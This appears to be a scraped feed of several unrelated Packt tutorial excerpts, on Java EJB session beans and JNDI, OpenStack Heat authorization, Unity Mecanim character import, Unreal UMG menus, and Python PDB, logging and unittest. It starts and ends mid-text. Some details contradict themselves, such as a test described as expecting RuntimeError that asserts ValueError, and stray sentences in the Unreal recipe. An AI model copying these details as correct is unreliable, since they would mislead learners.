import javax.ejb.Singleton;

@Singleton
@LocalBean
public class Student {
  ...
}
```

Accessing a session bean using dependency injection

You can access session beans either by using the @EJB annotation (for dependency injection) or by performing a Java Naming and Directory Interface (JNDI) lookup. EJB containers are required to make the JNDI URLs of EJBs available to clients.

Dependency injection of session beans using @EJB works only for managed components, that is, components of the application whose life cycle is managed by the EJB container. When a component is managed by the container, it is created (instantiated) by the container and also destroyed by the container. You do not create managed components using the new operator. The JEE-managed components that support direct injection of EJBs are servlets, managed beans of JSF pages, and EJBs themselves (one EJB can have other EJBs injected into it). Unfortunately, you cannot have the web container inject EJBs into JSPs or JSP beans. Also, you cannot have EJBs injected into any custom classes that you create and instantiate using the new operator.

We can use the Student bean (created previously) from a managed bean of JSF, as follows:

```java
import javax.ejb.EJB;
import javax.faces.bean.ManagedBean;

@ManagedBean
public class StudentJSFBean {
  @EJB
  private Student studentEJB;
}
```

Note that if you create an EJB with a no-interface view, then all the public methods in that EJB will be exposed to the clients. If you want to control which methods can be called by clients, then you should implement a business interface.

Creating a session bean using a local business interface

A business interface for an EJB is a simple Java interface with either the @Remote or @Local annotation.
So we can create a local interface for the Student bean as follows:

```java
import java.util.List;
import javax.ejb.Local;

@Local
public interface StudentLocal {
  public List<CourseDTO> getCourses();
}
```

We implement the session bean like this:

```java
import java.util.List;
import javax.ejb.Local;
import javax.ejb.Stateful;

@Stateful
@Local
public class Student implements StudentLocal {
  @Override
  public List<CourseDTO> getCourses() {
    // get courses and return them
    ...
  }
}
```

Clients can access the Student EJB only through the local interface:

```java
import javax.ejb.EJB;
import javax.faces.bean.ManagedBean;

@ManagedBean
public class StudentJSFBean {
  @EJB
  private StudentLocal student;
}
```

A session bean can implement multiple business interfaces.

Accessing a session bean using a JNDI lookup

Though accessing an EJB using dependency injection is the easiest way, it works only if the container manages the class that accesses the EJB. If you want to access an EJB from a POJO that is not a managed bean, then dependency injection will not work. Another scenario where dependency injection does not work is when the EJB is deployed in a separate JVM (which could be on a remote server). In such cases, you will have to access the EJB using a JNDI lookup (visit https://docs.oracle.com/javase/tutorial/jndi/ for more information on JNDI).

JEE applications can be packaged in an Enterprise Application Archive (EAR), which contains a .jar file for EJBs and a WAR file for the web application (and a lib folder containing the libraries required by both). If, for example, the name of the EAR file is CourseManagement.ear and the name of the EJB JAR file in it is CourseManagementEJBs.jar, then the name of the application is CourseManagement (the name of the EAR file) and the module name is CourseManagementEJBs. The EJB container uses these names to create the JNDI URLs for looking up EJBs. A global JNDI URL for an EJB is created as follows:

```
"java:global/<application_name>/<module_name>/<bean_name>![<bean_interface>]"
```

- java:global: Indicates that it is a global JNDI URL.
- <application_name>: The application name is typically the name of the EAR file.
- <module_name>: This is the name of the EJB JAR.
- <bean_name>: This is the name of the EJB bean class.
- <bean_interface>: This is optional if the EJB has a no-interface view, or if it implements only one business interface. Otherwise, it is the fully qualified name of a business interface.

EJB containers are also required to publish two more variations of the JNDI URL for each EJB. These are not global URLs, which means that they can't be used to access EJBs from clients that are not in the same JEE application (the same EAR):

```
"java:app/[<module_name>]/<bean_name>![<bean_interface>]"
"java:module/<bean_name>![<bean_interface>]"
```

The first URL can be used if the EJB client is in the same application, and the second URL can be used if the client is in the same module (the same JAR file as the EJB).

Before you look up any URL in a JNDI server, you need to create an InitialContext, which includes information such as the hostname of the JNDI server and the port on which it is running.
If you are creating the InitialContext in the same server, then there is no need to specify these attributes:

```java
InitialContext initCtx = new InitialContext();
Object obj = initCtx.lookup("jndi_url");
```

We can use the following JNDI URLs to access a no-interface (LocalBean) Student EJB (assuming that the name of the EAR file is CourseManagement and the name of the JAR file for the EJBs is CourseManagementEJBs):

- java:global/CourseManagement/CourseManagementEJBs/Student
  When to use: The client can be anywhere in the EAR file, because we are using a global URL. Note that we haven't specified the interface name, because we are assuming that the Student bean provides a no-interface view in this example.
- java:app/CourseManagementEJBs/Student
  When to use: The client can be anywhere in the EAR. We skipped the application name because the client is expected to be in the same application; this is because the namespace of the URL is java:app.
- java:module/Student
  When to use: The client must be in the same JAR file as the EJB.

We can use the following JNDI URLs to access the Student EJB that implements the local interface, StudentLocal:

- java:global/CourseManagement/CourseManagementEJBs/Student!packt.jee.book.ch6.StudentLocal
  When to use: The client can be anywhere in the EAR file, because we are using a global URL.
- java:global/CourseManagement/CourseManagementEJBs/Student
  When to use: The client can be anywhere in the EAR. We skipped the interface name because the bean implements only one business interface. Note that the object returned from this call will be of the StudentLocal type, and not Student.
- java:app/CourseManagementEJBs/Student or java:app/CourseManagementEJBs/Student!packt.jee.book.ch6.StudentLocal
  When to use: The client can be anywhere in the EAR. We skipped the application name because the JNDI namespace is java:app.
- java:module/Student or java:module/Student!packt.jee.book.ch6.StudentLocal
  When to use: The client must be in the same EAR as the EJB.

Here is an example of how we can call the Student bean with the local business interface from one of the objects (not managed by the web container) in our web application:

```java
InitialContext ctx = new InitialContext();
StudentLocal student = (StudentLocal) ctx.lookup("java:app/CourseManagementEJBs/Student");
return student.getCourses(id); //get courses from Student EJB
```

Summary

EJBs are ideal for writing business logic in web applications. They can act as the perfect bridge between web interface components, such as a JSF, servlet, or JSP, and data access objects, such as JDO. EJBs can be distributed across multiple JEE application servers (which could improve application scalability), and their life cycle is managed by the container. EJBs can easily be injected into managed objects or looked up using JNDI. Eclipse JEE makes creating and consuming EJBs very easy. The JEE application server GlassFish can also be managed, and applications deployed to it, from within Eclipse.


The orchestration service for OpenStack

Packt
24 Sep 2015
6 min read
This article by Adnan Ahmed, the author of the book OpenStack Orchestration, discusses the orchestration service for OpenStack.

Orchestration is a main feature provided and supported by OpenStack. It is used to orchestrate cloud resources, including applications, disk resources, IP addresses, load balancers, and so on. Heat contains a template engine that supports text files in which cloud resources are defined. These text files are written in a special format compatible with Amazon CloudFormation. A new OpenStack-native standard has also been developed for providing orchestration templates, called HOT (Heat Orchestration Template). Heat provides two types of clients, namely a command-line client and a web-based client integrated into the OpenStack dashboard.

The orchestration project (Heat) itself is composed of several subcomponents, listed as follows:

- Heat
- Heat engine
- Heat API
- Heat API-CFN

Heat uses the term stack to define a group of services, resources, parameter inputs, constraints, and dependencies. A stack can be defined using a text file; the important point, however, is to use the correct format. The JSON format used by AWS CloudFormation is also supported by Heat.

Heat workflow

Heat provides two types of interfaces: a web-based interface integrated into the OpenStack dashboard, and a command-line interface (CLI), which can be used from inside a Linux shell. The interfaces use the Heat API to send commands to the Heat engine via the messaging service (for example, RabbitMQ). A metering service such as Ceilometer or the CloudWatch API is used to monitor the performance of resources in the stack. These monitoring/metering services are used to trigger actions upon reaching a certain threshold. An example of this could be automatically launching a redundant web server behind a load balancer when the CPU load on the primary web server rises above 90 percent.

The orchestration authorization model

The Heat component of OpenStack uses an authorization model composed of mainly two types:

- Password-based authorization
- Authorization based on OpenStack identity trusts

This process is known as orchestration authorization.

Password authorization

In this type of authorization, a password is expected from the user. This password must match the password stored by the Heat engine in a database in encrypted form. The following are the steps used to generate a username/password:

1. A request is made to the Heat engine for a token or an authorization password. Normally, the Heat command-line client or the dashboard is used.
2. The validation checks will fail if the stack contains any resources under deferred operations.
3. If everything is normal, then a username/password is provided.
4. The username/password are stored in the database in encrypted form.

In some cases, the Heat engine, after obtaining the credentials, requests another token on the user's behalf, and thereafter access to all the roles of the stack owner is provided.

Keystone trusts authorization

Keystone trusts are extensions to the OpenStack identity service that are used for enabling the delegation of resources. The two delegates used in this method are the trustor and the trustee: the trustor is the user who delegates, and the trustee is the user who is being delegated to.
The following information from the trustor is required by the identity service to delegate a trustee:
The ID of the trustee (the user to be delegated; in the case of Heat, it will be the Heat user)
The roles to be delegated (the roles are configured using the Heat configuration file; for example, to launch a new instance to achieve auto-scaling when a threshold is reached)
Trusts authorization execution
The steps for creating a stack via an API request can be followed to execute a trust-based authorization. A token is used to create a trust between the stack owner (the trustor) and the Heat service user (also known as the trustee in this case). A special role is delegated. This role must be predefined in the trusts_delegated_roles list inside the heat.conf file. By default, all the available roles for the trustor are set to be available for the trustee, unless this is modified using a local RBAC policy. The trust ID is stored in an encrypted form in the database and is retrieved from the database when an operation is required.
Authorization model configuration
Heat supported only password-based authorization until the Kilo version of OpenStack was released. With the Kilo version of OpenStack, the following changes can be made to enable trusts-based authorization in the Heat configuration file:
Default setting in heat.conf: deferred_auth_method=password
To be replaced to enable trusts-based authentication: deferred_auth_method=trusts
The following parameter needs to be set to specify the trustor roles: trusts_delegated_roles =
As mentioned earlier, all available roles for the trustor will be assigned to the trustee if no specific roles are mentioned in the heat.conf file.
Stack domain users
The Heat stack domain user is used to authorize a user to carry out certain operations inside a virtual machine. Agents running inside virtual machine instances are provided with metadata. These agents report and share the performance statistics of the VM on which they are running. They use this metadata to apply any changes or some sort of configuration expressed in the metadata. A signal is passed to the Heat engine when an event completes successfully or with a failed status. A typical example could be to generate an alert when the installation of an application is completed on a specific virtual machine after its first reboot. Heat provides features for encapsulating all the stack-defined users into a separate domain. This domain is usually created to store the information related to the Heat service. A domain admin is created, which is used by Heat for the management of the stack-domain users.
Summary
In this article, we learned that Heat is the orchestration service for OpenStack. We learned about the Heat authorization models, including password authorization and Keystone trusts authorization, and how these models work. For more information on OpenStack, you can visit:
https://www.packtpub.com/virtualization-and-cloud/mastering-openstack
https://www.packtpub.com/virtualization-and-cloud/openstack-essentials
Resources for Article:
Further resources on this subject: Using OpenStack Swift [article] Installing OpenStack Swift [article] Securing OpenStack Networking [article]
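To make the notion of a stack and a HOT template more concrete, the following is a minimal, illustrative template. It is not taken from the book; the parameter name, image, and flavor values are placeholders chosen for this sketch and would need to match resources that exist in your own cloud.
heat_template_version: 2013-05-23
description: A minimal illustrative stack that boots a single server
parameters:
  image_id:
    type: string
    description: ID or name of the image to boot
resources:
  my_server:
    type: OS::Nova::Server
    properties:
      image: { get_param: image_id }
      flavor: m1.small
outputs:
  server_ip:
    description: First IP address of the server
    value: { get_attr: [my_server, first_address] }
Assuming this is saved as my_stack.yaml, a stack could then be created from the command-line client with something similar to heat stack-create my_stack -f my_stack.yaml -P image_id=<image>, although the exact client syntax depends on the OpenStack release in use.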

The Zombie Attacks!

Packt
24 Sep 2015
9 min read
 In this article by Jamie Dean author of the book Unity Character Animation with Mecanim: RAW, we will demonstrate the process of importing and animating a rigged character in Unity. In this article, we will cover: Starting a blank Unity project and importing the necessary packages Importing a rigged character model in the FBX format and adjusting import settings Typically, an enemy character such as this will have a series of different animation sequences, which will be imported separately or together from a 3D package. In this case, our animation sequences are included in separate files. We will begin, by creating the Unity project. (For more resources related to this topic, see here.) Setting up the project Before we start exploring the animation workflow with Mecanim's tools, we need to set up the Unity project: Create a new project within Unity by navigating to File | New Project.... When prompted, choose an appropriate name and location for the project. In the Unity - Project Wizard dialog that appears, check the relevant boxes for the Character Controller.unityPackage and Scripts.unityPackage packages. Click on the Create button. It may take a few minutes for Unity to initialize. When the Unity interface appears, import the PACKT_cawm package by navigating to Assets | Import Package | Custom Package.... The Import package... window will appear. Navigate to the location where you unzipped the project files, select the unity package, and click on Open.The assets package will take a little time to decompress. When the Importing Package checklist appears, click on the Import button in the bottom-right of the window. Once the assets have finished importing, you will start with a default blank scene. Importing our enemy Now, it is time to import our character model: Minimize Unity. Navigate to the location where you unzipped the project files. Double-click on the Models folder to view its contents. Double-click on the zombie_m subfolder to view its contents.The folder contains an FBX file containing the rigged male zombie model and a separate subfolder containing the associated textures. Open Unity and resize the window so that both Unity and the zombie_m folder contents are visible. In Unity, click on the Assets folder in the Project panel. Drag the zombie_m FBX asset into the Assets panel to import it.Because the FBX file contains a normal map, a window will pop up asking if you want to set this file's import settings to read it correctly. Click on the Fix Now button. FBX files can contain embedded bitmap textures, which can be imported with the model. This will create subfolders containing the materials and textures within the folder where the model has been imported. Leaving the materials and textures as subfolders of the model will make them difficult to find within the project. The zombie model and two folders should now be visible in the FBX_Imports folder in the Assets panel. In the next step, we will move the imported material and texture assets into the appropriate folders in the Unity project. Organizing the material and textures The material and textures associated with the zombie_m model are currently located within the FBX_Imports folder. We will move these into different folders to organize them within the hierarchy of our project: Double-click on the Materials folder and drag the material asset contained within it into the PACKT_Materials folder in the Project panel. Return to the FBX_Imports folder by clicking on its title at the top of the Assets panel interface. 
Double-click on the textures folder. This will be named to be consistent with the model. Drag the two bitmap textures into the PACKT_Textures folder in the Project panel. Return to the FBX_Imports folder and delete the two empty subfolders.The moved material and textures will still be linked to the model. We will make sure of this by instancing it in the current empty scene. Drag the zombie_m asset into the Hierarchy panel. It may not be immediately visible within the Scene view due to the default import scale settings. We will take care of this in the next step. Adjusting the import scale Unity's import settings can be adjusted to account for the different tools commonly used to create 2D and 3D assets. Import settings are adjusted in the Inspector panel, which will appear on the right of the unity interface by default: Click on the zombie_m game object within the Hierarchy panel.This will bring up the file's import settings in the Inspector panel. Click on the Model tab. In the Scale Factor field, highlight the current number and type 1. The character model has been modeled to scale in meters to make it compatible with Unity's units. All 3D software applications have their own native scale. Unity does a pretty good job at accommodating all of them, but it often helps to know which software was used to create them. Scroll down until the Materials settings are visible. Uncheck the Import Materials checkbox.Now that we have got our textures and materials organized within the project, we want to make sure they are not continuously imported into the same folder as the model. Leave the remaining Model Import settings at their default values.We will be discussing these later on in the article, when we demonstrate the animation import. Click on the Apply button. You may need to scroll down within the Inspector panel to see this: The zombie_m character should now be visible in the Scene view: This character model is a medium resolution model—4410 triangles—and has a single 1024 x 1024 albedo texture and separate 1024 x 1024 specular and normal maps. The character has been rigged with a basic skeleton. The rigging process is essential if the model is to be animated. We need to save our progress, before we get any further: Save the scene by navigating to File | Save Scene as.... Choose an appropriate filename for the scene. Click on the Apply button. Despite the fact that we have only added a single game object to the default scene, there are more steps that we will need to take to set up the character and it will be convenient for us to save the current set up in case anything goes wrong. In the character animation, there are looping and single-shot animation sequences. Some animation sequences such as walk, run, idle are usually seamless loops designed to play back-to-back without the player being aware of where they start and end. Other sequences, typically, shooting, hitting, being injured or dying are often single-shot animations, which do not need to loop. We will start with this kind, and discuss looping animation sequences later in the article. In order to use Mecanim's animation tools, we need to set up the character's Avatar so that the character's hierarchy of bones is recognized and can be used correctly within Unity. Adjusting the rig import settings and creating the Avatar Now that we have imported the model, we will need to adjust the import settings so that the character functions correctly within our scene: Select zombie_m in the Assets panel. 
The asset's import settings should become visible within the Inspector panel. This settings rollout contains three tabs: Model, Rig, and Animations. Since we have already adjusted the Scale Factor within the Model Import settings, we will move on to the Rig import settings where we can define what kind of skeleton our character has. Choosing the appropriate rig import settings Mecanim has three options for importing rigged models: Legacy, Generic, and Humanoid. It also has a none option that should be applied to models that are not intended to be animated. Legacy format was previously the only option for importing skeletal animation in Unity. It is not possible to retarget animation sequences between models using Legacy, and setting up functioning state machines requires quite a bit of scripting. It is still a useful tool for importing models with fewer animation sequences and for simple mechanical animations. Legacy format animations are not compatible with Mecanim. Generic is one of the new animation formats that are compatible with Mecanim's animator controllers. It does not have the full functionality of Mecanim's character animation tools. Animations sequences imported with the generic format cannot be retargeted and are best used for quadrupeds, mechanical devices, pretty much anything except a character with two arms and two legs. The Humanoid animation type allows the full use of Mecanim's powerful toolset. It requires a minimum of 15 bones, and assumes that your rig is roughly human shaped with a pair of arms and legs. It can accommodate many more intermediary joints and some basic facial animation. One of the greatest benefits of using the Humanoid type is that it allows animation sequences to be retargeted or adapted to work with different rigs. For instance, you may have a detailed player character model with a full skeletal rig (including fingers and toes joints), maybe you want to reuse this character's idle sequence with a background character that is much less detailed, and has a simpler arrangement of bones. Mecanim makes it possible reuse purpose built motion sequences and even create useable sequences from motion capture data. Now that we have introduced these three rig types, we need to choose the appropriate setting for our imported zombie character, which in this case is Humanoid: In the Inspector panel, click on the Rig tab. Set the Animation Type field to Humanoid to suit our character skeleton type. Leave Avatar Definition set to Create From This Model. Optimize Game Objects can be left checked. Click on the Apply button to save the settings and transfer all of the changes that you have made to the instance in the scene.  The Humanoid animation type is the only one that supports retargeting. So if you are importing animations that are not unique and will be used for multiple characters, it is a good idea to use this setting. Summary In this article, we covered the major steps involved in animating a premade character using the Mecanim system in Unity. We started with FBX import settings for the model and the rig. We covered the creation of the Avatar by defining the bones in the Avatar Definition settings. Resources for Article: Further resources on this subject: Adding Animations[article] 2D Twin-stick Shooter[article] Skinning a character [article]

User Interface

Packt
23 Sep 2015
10 min read
This article, written by John Doran, the author of the Unreal Engine Game Development Cookbook, covers the following recipes: Creating a main menu Animating a menu (For more resources related to this topic, see here.) In order to create a good game project, you need to be able to communicate information to the player. To do this, we need to create a user interface (UI), which will allow us to display information such as the player's health, inventory, and so on. Inside Unreal 4, we use the Slate UI framework to create user interfaces, however, it's a very complex system. To make things easier for end users, Unreal also released the Unreal Motion Graphics (UMG) UI Designer which is a visual UI authoring tool with a much easier workflow. This is what we will be using in this article. For more information on Slate, refer to https://docs.unrealengine.com/latest/INT/Programming/Slate/index.html. Creating a main menu A main menu can serve as an introduction to your game and is a great place for us to discuss some additional things that UMG has, such as Texts and Buttons. We'll also learn how we can make buttons do things. Let's spend some time to see just how easy it is to create one! For more information on the client-server model, refer to https://en.wikipedia.org/wiki/Client%E2%80%93server_model. How to do it… To give you an idea of how it works, let's take a simple example of a coin collectable: Create a new level by going to File | New Level and select Empty Level. Next, inside the Content Browser tab, go to our UI folder, then to Add New | User Interface | Widget Blueprint, and give it a name of MainMenu. Double-click on it to open the editor. In this menu, we are going to have the title of the game and then a series of buttons the player can press: From the Palette tab, open up the Common section and drag and drop a Button onto the middle of the screen. Select the button and change its Size X to 400 and Size Y to 80. We will also rename the button to Play Game. Drag and drop a Text object onto the Play Game button and you should see it snap on to the button as a child. Under Content, change Text to Play Game. From here under Appearance, change the color of the button to black and change the Font size to 32. From the Hierarchy tab, select the Play Game button and copy and paste it to create duplicate. Move the button down, rename it to Quit Game, and change the Text to Content as well. Move both of the objects so that they're on the bottom part of the HUD, slightly above and side by side, as shown in the following image: Lastly, we'll want to set our pivots and anchors accordingly. When you select either the Quit Game or Play Game buttons, you may notice a sun-like looking widget that displays the Anchors of the object (known as the Anchor Medallion). In our case, open Anchors from the Details panel and click on the bottom-center option. Now that we have the buttons created, we want them to actually do something when we click on them. Select the Play Game button and from the Details tab, scroll down until you see the Events component. There should be a series of big green + buttons. Click on the green button beside OnClicked. Next, it will take us to the Event Graph with the appropriate event created for us. To the right of the event, right-click and create an Open Level action. Under Level Name, put in whatever level you like (for example, StarterMap) and then connect the output of the OnClicked action to the input of the Open Level action. 
To the right of that, create a Remove from Parent action to make sure that when we leave that, the menu doesn't stay. Finally, create a Get Player Controller action and to the right of it a Set Show Mouse Cursor action, which should be disabled, so that the mouse will no longer be visible since we will want to see the mouse in the menu. (Drag Return Value from the Get Player Controller action to create a new node and search for the mouse cursor action.) Now, go back to the Designer button and then select the Quit Game button. Click on the OnClicked button as well and to the right of this one, create a Quit Game action and connect the output of the OnClicked action to the input of the Quit Game action. Lastly, as a bit of polish, let's add our game's title to the screen. Drag and drop another Text object onto the scene, this time with Anchor at the top-center. From here, change Position X to 0 and Position Y to 176. Change Alignment in the X axis to .5 and check the Size to Content option for it to automatically resize. Set the Content component's Text property to the game's name (in my case, Game Name). Under the Appearance component, set the Font size to 93 and set Justification to Center. There are a number of other styling options that you may wish to use when developing your HUDs. For more information about it, refer to https://docs.unrealengine.com/latest/INT/Engine/UMG/UserGuide/Styling/index.html. Compile the menu, and saveit. Now we need to actually have the widget show up. To do so, we'll need to take the same steps as we did earlier. Open up Level Blueprint by going to Blueprints | Open Level Blueprint and create an EventBeginPlay event. Then, to the right of this, right-click and create a Create Widget action. From the dropdown under Class, select MainMenu and connect the arrow from Event Begin Play to the input of Create MainMenu_C Widget. After this, click and drag the output arrow and create an Add to Viewport event. Then, connect Return Value of our Create Widget action to Target of the Add to Viewport action. Now lastly, we also want to display the player's cursor on the screen to show buttons. To do this, right-click and select Get Player Controller. Then, from Return Value of that, create a Show Mouse Cursor object in Set. Connect the output of the Add to Viewport action to the input of the Show Mouse Cursor action. Compile, save, and run the project! With this, our menu is completed! We can quit the game without any problem, and pressing the Play Game button will start our level! Animating a menu You may have created a menu or UI element at some point, but rather than having it static and non-moving, let's spend some time looking at how we can animate the menus by having them fly in and out or animating them in some way. This will help add to the polish of the title as well as enable players to notice things easier as they move in. Getting ready Before we start working on this, we need to have a project created and set up. Do the previous recipe all the way to completion. How to do it… Open up the MainMenu blueprint once more and from the bottom-left in the Animations tab, click on the +Animation button and give the new animation a name of MenuFlyIn. Select the newly created animation and you should see the window on the right-hand side brighten up. Next, click on the Auto Key toggle to have the animation editor automatically set keys that are appropriate for our implementation. 
If it's not there already, move the timeline bar (the white line with two orange ends on the top and bottom) to the 0.00 mark on the animation timeline. Next, select the Game Name object and under Color and Opacity, open it and change the A (alpha) value to 0. Now move the timeline bar to the 1.00 mark and then open the color again and set the A value to 1. You'll notice a transition—going from a completely transparent text to a fully shown one. This is a good start. Let's have the buttons fly in after the text appears. Next, move the Time bar to the 2.00 mark and select the Play Game button. Now from the Details tab, you'll notice that under the variables, there are new + icons to the left of variables. This value will save the value for use in the animations. Click on the + icon by the Position Y value. If you use your scroll wheel while inside the dark grey portion of the timeline bar (where the keyframe numbers are displayed), it zooms in and out. This can be quite useful when you create more complex animations. Now move the Time bar to the 1.00 mark and move the Play Game button off the screen. By doing the animation in this way, we are saving where we want it to be first at the end, and then going back in time to do the animations. Do the same animation for the Quit Game button. Now that our animation is created, let's make it in a way so that when the object starts, this animation is played. Click on the Graph button and from the MyBlueprint tab under the Graphs section, double-click on the Event Construct event, which is called as soon as we add the menu to the scene. Grab the pin on the end of it and create a Play Animation action. Drag and drop a MenuFlyIn animation into the scene and select Get. Connect its output pin to the In Animation property of the Play Animation action. Now that we have the animation work when we create the menu, let's have it play when we leave the menu. Select the Play Animation and Menu Fly In variables and copy them. Then move to the OnClicked (Play Game) action. Drag the OnClicked event over to the left and remove its original connection to the Open Level action by holding down Alt and clicking. Now paste (Ctrl + V) the new objects and connect the out pin of OnClicked (Play Game) to the input of Play Animation. Now change Play Mode to Reverse. To the right of this, create a Delay action. For the Duration variable, we want it to wait as long as the animation is, so from the Menu Fly In variable, create another pin and create a Get End Time action. Connect Return Value of Get End Time to the input of the Delay action. Connect the output of the Play Animation action to the input of the Delay action and the Completed output of the Delay action to the input of the Open Level action. Now we need to do the same for the OnClicked (Quit Game) event. Now compile, save, and run the game! Our menu is now completed and we've learned about how animation works inside UMG! For more examples of using UMG for animation, refer to https://docs.unrealengine.com/latest/INT/Engine/UMG/UserGuide/Animation/index.html. Summary This article gave you some insight on Slate and the UMG Editor to create a number of UI elements and an animated main menu to tie your whole game together. We created a main menu and also learned how to make buttons do things. We spent some time looking at how we can animate menus by having them fly in and out. 
Resources for Article: Further resources on this subject: The Blueprint Class[article] Adding Fog to Your Games [article] Overview of Unreal Engine 4 [article]

Debugging Applications with PDB and Log Files

Packt
23 Sep 2015
13 min read
In this article by Dan Nixon of the book Getting Started with Python and Raspberry Pi, we will learn more about how to debug Python code using the Python Debugger (PDB) tool and how we can use the Python logging framework to make complex applications written in Python easier to debug when they fail. (For more resources related to this topic, see here.) We will also look at the technique of unit testing and how the unittest Python module can be used to test small sections of a Python application to ensure that it is functioning as expected. These techniques are commonly used in applications written in other languages and are good skills to learn if you are often going to be developing applications.
The Python debugger
PDB is a tool that allows real-time debugging of running Python code. It can help to track down issues with the logic of a program in order to find the cause of a crash or unexpected behavior. PDB can be launched with the following command:
pdb2.7 do_calculation.py
This will open a new PDB shell, as shown in the following screenshot:
We can use the continue command (which can be shortened to c) to execute the next section of the code until a breakpoint is hit. As we are yet to declare any breakpoints, this will run the script until it exits normally, as shown in the following screenshot:
We can set breakpoints in the application, where the program will be stopped, and you will be taken back to the PDB shell in order to debug the control flow of the program. The easiest way to set a breakpoint is by giving a specific line in a file, for example:
break Operation.py:7
This command will add a breakpoint on line 7 of Operation.py. When this is added, PDB will confirm the file and the line number, as shown in the following screenshot:
Now, when we run the application, we will see the program stop each time the breakpoint is reached. When a breakpoint is reached, we can resume the program using the c command.
When paused at a breakpoint, we can view the details of the local variables in the current scope. For example, at the breakpoint we have added, there is a variable named name, which we can see the value of by using the following command:
p name
This outputs the value of the variable, as shown in the following screenshot:
When at a breakpoint, we can also get a stack trace of the functions that have been called so far. This is done using the bt command and gives output like that shown in the following screenshot:
We can also modify the values of the variables when paused at a breakpoint. To do this, simply assign a value to the variable name as you would in a regular Python script:
name = 'subtract'
In the following screenshot, this was used to change the first operation in the do_calculation.py script from add to subtract; the effect on the calculation is seen in the different result value.
When at a breakpoint, we can also use the l command to see the current line the program is paused at. An example of this is shown in the following screenshot:
We can also set up a series of commands to be executed when we hit a breakpoint. This can allow debugging to be automated to an extent by automatically recording or modifying the values of the variables at certain points in the program's execution. This can be demonstrated using the following commands on a new instance of PDB with no breakpoints set (first, quit PDB using the q command, and then re-launch it):
break Operation.py:7
commands
p name
c
This gives the following output.
Note that the commands are entered on a terminal prefixed (com) rather than the PDB terminal prefixed (pdb). This set of commands tells PDB to print the value of the name variable and continue execution when the last added breakpoint was hit. This gives the output shown in the following screenshot: Within PDB, you can also use the ? command to get a full list of the available commands and help on using them, as shown in the following screenshot: Further information and full documentation on PDB is available at https://docs.python.org/2/library/pdb.html. Writing log files The next technique we will look at is having our application output a log file. This allows us to get a better understanding of what was happening at the time an application failed, which can provide key information into finding the cause of the failure, especially when the failure is being reported by a user of your application. We will add some logging statements to the Calculator.py and Operation.py files. To do this, we must first add the import for the logging module (https://docs.python.org/2/library/logging.html) to the start of each python file, which is simply: import logging In the Operation.py file, we will add two logging calls in the evaluate function, as shown in the following code: def evaluate(self, a, b): logging.getLogger(__name__).info("Evaluating operation: %s" % (self._operation)) logging.getLogger(__name__).debug("RHS: %f, LHS: %f" % (a, b)) This will output two logging statements: one at the debug level and one at the information level. There are in total five unique levels at which messages can be output. In increasing severity, they are: debug() info() warning() error() critical() Log handlers can be filtered to only process the log messages of a certain severity if required. We will see this in action later in this section. The logging.getLogger(__name__) call is used to retrieve the Logger class for the current module (where the name of the module is given by the __name__ variable). By default, each module uses its own Logger class identified by the name of the module. Next, we can add some debugging statements to the Calculator.py file in the same way. 
Here, we will add logging to the enter_value, enter_operation, evaluate, and all_clear functions, as shown in the following code snippet: def enter_value(self, value): if len(self._input_list) > 0 and not isinstance(self._input_list[-1], Operation): raise RuntimeError("Must enter an operation next") logging.getLogger(__name__).info("Adding value: %f" % (value)) self._input_list.append(float(value)) def enter_operation(self, operation_name): if len(self._input_list) == 0 or isinstance(self._input_list[-1], Operation): raise RuntimeError("Must enter a value next") logging.getLogger(__name__).info("Adding operation: %s" % (operation_name)) self._input_list.append(Operation(operation_name)) def evaluate(self): logging.getLogger(__name__).info("Evaluating calculation") if len(self._input_list) % 2 == 0: raise RuntimeError("Input length mismatch") self._result = self._input_list[0] for idx in range(1, len(self._input_list), 2): operation = self._input_list[idx] next_value = self._input_list[idx + 1] logging.getLogger(__name__).debug("Next function: %f %s %f" % ( self._result, str(operation), next_value)) self._result = operation.evaluate(self._result, next_value) logging.getLogger(__name__).info("Result is: %f" % (self._result)) return self._result def all_clear(self): logging.getLogger(__name__).info("Clearing calculator") self._input_list = [] self._result = 0.0 Finally, we need to configure a handler for the log messages. This is what will handle the messages sent by each logger and output them to a suitable destination; for example, the standard output or a file. We will configure this in the do_conversion.py file. First, we will configure a basic handler that will print all the log messages to the standard output so that they appear on the terminal. This can be achieved with the following code: logging.basicConfig(level=logging.DEBUG) We will also add the following line to the end of the script. This is used to close any open log handlers and should be included at the very end of an application (the logging framework should not be used after calling this function). logging.shutdown() Now, we can see the effects by running the script using the following command: python do_calculation.py This will give an output to the terminal, as shown in the following screenshot: We can also have the log output written to a file instead of printed to the terminal by adding a filename to the logger configuration. This helps to keep the terminal free of unnecessary information. logging.basicConfig(level=logging.DEBUG, filename='calc.log') When executed, this will give no additional output other than the result of the calculation, but will have created an additional file, calc.log, which contains the log messages, as shown in the following screenshot: Unit testing Unit testing is a technique for automated testing of small sections ("units") of code to ensure that the components of a larger application are working as intended, independently of each other. There are many frameworks for this in almost every language. In Python, we will be using the unittest module, as this is included with the language and is the most common framework used in the Python applications. To add unit tests to our calculator module, we will create an additional module in the same directory named test. Inside that will be three files: __init__.py (used to denote that a directory is a Python package), test_Calculator.py, and test_Operation.py. 
After creating this additional module, the structure of the code will be the same as shown in the following image: Next, we will modify the test_Operation.py file to include a test case for the Operation class. As always, this will start with the required imports for the modules we will be using: import unittest from calculator.Operation import Operation We will be creating a class, test_Operation, which inherits from the TestCase class provided by the unittest module. This contains the logic required to run the functions of the class as individual unit tests. class test_Operation(unittest.TestCase): Now, we will define four tests to test the creation of a new Operation instance for each of the operations that are supported by the class. Here, the assertEquals function is used to test for equality between two variables; this determines if the test passes or not. def test_create_add(self): op = Operation('add') self.assertEqual(str(op), 'add') def test_create_subtract(self): op = Operation('subtract') self.assertEqual(str(op), 'subtract') def test_create_multiply(self): op = Operation('multiply') self.assertEqual(str(op), 'multiply') def test_create_divide(self): op = Operation('divide') self.assertEqual(str(op), 'divide') In this test we are checking that a RuntimeError is raised when an unknown operation is given to the Operation constructor. We will do this using the assertRaises function. def test_create_fails(self): self.assertRaises(ValueError, Operation, 'not_a_function') Next, we will create four tests to ensure that each of the known operations evaluates to the correct result: def test_add(self): op = Operation('add') result = op.evaluate(5, 2) self.assertEqual(result, 7) def test_subtract(self): op = Operation('subtract') result = op.evaluate(5, 2) self.assertEqual(result, 3) def test_multiply(self): op = Operation('multiply') result = op.evaluate(5, 2) self.assertEqual(result, 10) def test_divide(self): op = Operation('divide') result = op.evaluate(5, 2) self.assertEqual(result, 2) This will form the test case for the Operation class. Typically, the test file for a module should have the name of the module prefixed by test, and the name of each test function within a test case class should start with test. Next, we will create a test case for the Calculator class in the test_Calculator.py file. This again starts 